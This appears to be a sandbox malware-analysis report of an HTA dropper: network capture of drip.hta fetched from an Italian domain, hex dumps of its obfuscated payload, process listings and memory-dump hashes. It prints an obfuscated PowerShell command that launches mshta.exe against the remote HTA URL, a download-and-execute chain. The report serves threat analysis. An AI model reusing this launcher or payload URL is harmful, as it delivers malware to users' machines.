      Apr 24, 2024 06:45:19.938087940 CEST4434972089.46.106.29192.168.2.6
      TimestampSource PortDest PortSource IPDest IP
      Apr 24, 2024 06:45:17.597372055 CEST5415053192.168.2.61.1.1.1
      Apr 24, 2024 06:45:17.757365942 CEST53541501.1.1.1192.168.2.6
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Apr 24, 2024 06:45:17.597372055 CEST192.168.2.61.1.1.10x68f7Standard query (0)www.sessosesso.itA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Apr 24, 2024 06:45:17.757365942 CEST1.1.1.1192.168.2.60x68f7No error (0)www.sessosesso.it89.46.106.29A (IP address)IN (0x0001)false
      • www.sessosesso.it
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.64972089.46.106.294436544C:\Windows\System32\mshta.exe
      TimestampBytes transferredDirectionData
      2024-04-24 04:45:18 UTC339OUTGET /assets/aw/drip.hta HTTP/1.1
      Accept: */*
      Accept-Language: en-CH
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: www.sessosesso.it
      Connection: Keep-Alive
      2024-04-24 04:45:19 UTC226INHTTP/1.1 200 OK
      Server: aruba-proxy
      Date: Wed, 24 Apr 2024 04:45:18 GMT
      Content-Length: 78915
      Connection: close
      Last-Modified: Wed, 24 Apr 2024 00:10:53 GMT
      Accept-Ranges: bytes
      X-ServerName: ipvsproxy74.ad.aruba.it
      2024-04-24 04:45:19 UTC16158INData Raw: 99 dc 7c 4f a6 a0 1a bd 26 65 3a 86 98 3e 6a fb 08 af 5f 20 9e 12 e3 ff 51 f6 e5 39 02 42 d7 22 b2 6d 5d 13 8f b8 b1 0e 6f 30 06 cb f3 87 74 7a 2c 02 91 61 64 15 dd 86 f9 7c fe af ba e0 bb e3 8e 18 d4 2b e1 57 6b 4f fe 51 b1 6e 0c 17 0b c9 82 6b 0d ff b0 76 bd 9d 90 d6 19 13 b9 01 53 8e 74 23 3d db b3 48 99 d4 97 41 62 13 64 6e 7a e1 70 35 2d 4f d3 bc 32 18 5a 37 9b 0a 3d 57 96 fd fd 22 fa e9 da 30 15 39 d2 38 68 6e 13 aa 39 21 5b 38 a2 83 d4 04 bb b8 f0 25 80 7c ad 8e 97 3f ab 65 15 41 74 91 07 40 20 f3 7c 9a 53 c3 04 af fe 79 af 05 b4 13 29 f8 66 41 f8 b5 af 98 8b 44 a1 28 c3 ad 95 f7 ac ca 31 62 63 e0 88 21 64 2c 20 d1 7e 33 df 91 8a 97 3c 1c da 33 98 52 90 87 68 38 f8 2a 00 57 1a 06 cd e4 d4 52 b0 48 70 45 dc cc 94 de 1a 57 64 0f 9d 2b 70 78 1c 79 31
      Data Ascii: |O&e:>j_ Q9B"m]o0tz,ad|+WkOQnkvSt#=HAbdnzp5-O2Z7=W"098hn9![8%|?eAt@ |Sy)fAD(1bc!d, ~3<3Rh8*WRHpEWd+pxy1
      2024-04-24 04:45:19 UTC16384INData Raw: 4f 4d 2c 57 56 2c 4b 51 2c 4b 49 2c 59 54 2c 4b 49 2c 4b 51 2c 4f 4d 2c 4b 49 2c 57 56 2c 4b 51 2c 4b 49 2c 6b 67 2c 75 75 2c 4b 51 2c 4f 4d 2c 77 52 2c 70 41 2c 4b 51 2c 4f 4d 2c 4f 4d 2c 4b 49 2c 4b 51 2c 4f 4d 2c 6f 4b 2c 77 52 2c 4b 51 2c 4f 4d 2c 4f 4d 2c 4b 49 2c 4b 51 2c 4f 4d 2c 57 56 2c 57 56 2c 4b 51 2c 4f 4d 2c 77 52 2c 70 41 2c 4b 51 2c 4f 4d 2c 57 56 2c 77 52 2c 4b 51 2c 4f 4d 2c 57 56 2c 6f 4b 2c 4b 51 2c 4b 49 2c 6b 67 2c 70 41 2c 4b 51 2c 4b 49 2c 59 54 2c 4b 49 2c 4b 51 2c 4b 49 2c 6b 67 2c 6b 67 2c 4b 51 2c 4b 49 2c 6b 67 2c 75 75 2c 4b 51 2c 4f 4d 2c 77 52 2c 73 59 2c 4b 51 2c 4f 4d 2c 6f 4b 2c 77 52 2c 4b 51 2c 4f 4d 2c 57 56 2c 73 59 2c 4b 51 2c 4f 4d 2c 70 41 2c 4f 4d 2c 4b 51 2c 4f 4d 2c 77 52 2c 4b 49 2c 4b 51 2c 4b 49 2c 6b 67 2c
      Data Ascii: OM,WV,KQ,KI,YT,KI,KQ,OM,KI,WV,KQ,KI,kg,uu,KQ,OM,wR,pA,KQ,OM,OM,KI,KQ,OM,oK,wR,KQ,OM,OM,KI,KQ,OM,WV,WV,KQ,OM,wR,pA,KQ,OM,WV,wR,KQ,OM,WV,oK,KQ,KI,kg,pA,KQ,KI,YT,KI,KQ,KI,kg,kg,KQ,KI,kg,uu,KQ,OM,wR,sY,KQ,OM,oK,wR,KQ,OM,WV,sY,KQ,OM,pA,OM,KQ,OM,wR,KI,KQ,KI,kg,
      2024-04-24 04:45:19 UTC16384INData Raw: 49 2c 4b 51 2c 4b 49 2c 59 54 2c 75 75 2c 4b 51 2c 4f 4d 2c 75 75 2c 57 56 2c 4b 51 2c 4f 4d 2c 77 52 2c 75 75 2c 4b 51 2c 4f 4d 2c 57 56 2c 73 59 2c 4b 51 2c 4b 49 2c 6b 67 2c 6b 67 2c 4b 51 2c 4f 4d 2c 57 56 2c 4b 49 2c 4b 51 2c 4f 4d 2c 57 56 2c 75 75 2c 4b 51 2c 4b 49 2c 59 54 2c 6b 67 2c 4b 51 2c 4f 4d 2c 73 59 2c 6f 4b 2c 4b 51 2c 4f 4d 2c 77 52 2c 77 52 2c 4b 51 2c 4b 49 2c 59 54 2c 4b 49 2c 4b 51 2c 4b 49 2c 6b 67 2c 57 56 2c 4b 51 2c 4b 49 2c 59 54 2c 6b 67 2c 4b 51 2c 4f 4d 2c 57 56 2c 4b 49 2c 4b 51 2c 4b 49 2c 6b 67 2c 75 75 2c 4b 51 2c 4f 4d 2c 4f 4d 2c 6b 67 2c 4b 51 2c 4f 4d 2c 6f 4b 2c 77 52 2c 4b 51 2c 4f 4d 2c 77 52 2c 75 75 2c 4b 51 2c 4f 4d 2c 4f 4d 2c 6b 67 2c 4b 51 2c 4f 4d 2c 6f 4b 2c 59 54 2c 4b 51 2c 4b 49 2c 6b 67 2c 4b 49 2c 4b
      Data Ascii: I,KQ,KI,YT,uu,KQ,OM,uu,WV,KQ,OM,wR,uu,KQ,OM,WV,sY,KQ,KI,kg,kg,KQ,OM,WV,KI,KQ,OM,WV,uu,KQ,KI,YT,kg,KQ,OM,sY,oK,KQ,OM,wR,wR,KQ,KI,YT,KI,KQ,KI,kg,WV,KQ,KI,YT,kg,KQ,OM,WV,KI,KQ,KI,kg,uu,KQ,OM,OM,kg,KQ,OM,oK,wR,KQ,OM,wR,uu,KQ,OM,OM,kg,KQ,OM,oK,YT,KQ,KI,kg,KI,K
      2024-04-24 04:45:19 UTC16384INData Raw: 00 a0 18 00 00 10 1d 00 00 70 21 00 00 00 22 00 00 40 22 00 00 60 22 00 00 e0 23 00 00 40 24 00 00 f0 25 00 00 c0 26 00 00 40 29 00 00 90 29 00 00 c0 29 00 00 10 2a 00 00 50 2c 00 00 e0 2c 00 00 10 2d 00 00 00 00 00 00 56 65 72 69 66 69 63 61 74 69 6f 6e 20 53 74 61 72 74 65 64 00 00 00 00 43 61 6c 63 75 6c 61 74 6f 72 20 70 61 63 6b 61 67 65 20 72 65 67 69 73 74 72 61 74 69 6f 6e 20 6e 65 65 64 65 64 21 00 43 61 6c 63 75 6c 61 74 6f 72 20 70 61 63 6b 61 67 65 20 72 65 67 69 73 74 72 61 74 69 6f 6e 20 73 74 61 72 74 65 64 21 00 00 00 00 43 61 6c 63 75 6c 61 74 6f 72 20 70 61 63 6b 61 67 65 20 72 65 67 69 73 74 72 61 74 69 6f 6e 20 66 69 6e 69 73 68 65 64 21 00 00 00 43 61 6c 63 75 6c 61 74 6f 72 53 74 61 72 74 65 64 00 00 00 4d 00 69 00 63 00 72 00 6f 00
      Data Ascii: p!"@"`"#@$%&@)))*P,,-Verification StartedCalculator package registration needed!Calculator package registration started!Calculator package registration finished!CalculatorStartedMicro
      2024-04-24 04:45:19 UTC13605INData Raw: ff 47 47 47 ff 47 47 47 ff ff ff ff ff ff ff ff ff 46 46 46 ff 47 47 47 ff ff ff ff ff ff ff ff ff 46 46 46 ff 47 47 47 ff ff ff ff ff ff ff ff ff 47 47 47 ff 46 46 46 ff 47 47 47 ff 47 47 47 ff 47 47 47 ff 47 47 47 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 47 47 47 ff 46 46 46 ff 47 47 47 ff 46 46 46 ff 46 46 46 ff ff ff ff ff ff ff ff ff 47 47 47 ff 46 46 46 ff 47 46 47 ff 47 46 47 ff 46 46 46 ff 47 47 47 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 47 47 47 ff 47 47 47 ff 46 46 46 ff 47 47 47 ff ff ff ff ff ff ff ff ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 47 47 47 ff 47 47 47 ff 47 46 46 ff 46 46 46 ff ff ff ff ff ff ff ff ff 47 46 46 ff 47 47 47 ff 46 46 46 ff 46 46
      Data Ascii: GGGGGGFFFGGGFFFGGGGGGFFFGGGGGGGGGGGGFFFFFFFFFGGGFFFGGGFFFFFFGGGFFFGFGGFGFFFGGGFFFFFFFFFFFFGGGGGGFFFGGGFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGFFFFFGFFGGGFFFFF


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:2
      Start time:06:45:14
      Start date:24/04/2024
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta
      Imagebase:0x7ff6e3d50000
      File size:452'608 bytes
      MD5 hash:04029E121A0CFA5991749937DD22A1D9
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:3
      Start time:06:45:14
      Start date:24/04/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff66e660000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:4
      Start time:06:45:16
      Start date:24/04/2024
      Path:C:\Windows\System32\mshta.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/drip.hta
      Imagebase:0x7ff7e16b0000
      File size:14'848 bytes
      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:false

      Target ID:6
      Start time:06:45:19
      Start date:24/04/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Imagebase:0x7ff7403e0000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Reset < >
        Memory Dump Source
        • Source File: 00000004.00000002.3451194126.000001C168140000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C168140000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_1c168140000_mshta.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
        • Instruction ID: fbec5ffad3504ae6a29ae5b3e36272cc66fd7155dc094f0624dbfabc7b6470bd
        • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
        • Instruction Fuzzy Hash: 319002544D64166AF45411961C4569C5040A79A250FD444A04C2790145D48D42971252
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000004.00000002.3451194126.000001C168140000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C168140000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_1c168140000_mshta.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
        • Instruction ID: fbec5ffad3504ae6a29ae5b3e36272cc66fd7155dc094f0624dbfabc7b6470bd
        • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
        • Instruction Fuzzy Hash: 319002544D64166AF45411961C4569C5040A79A250FD444A04C2790145D48D42971252
        Uniqueness

        Uniqueness Score: -1.00%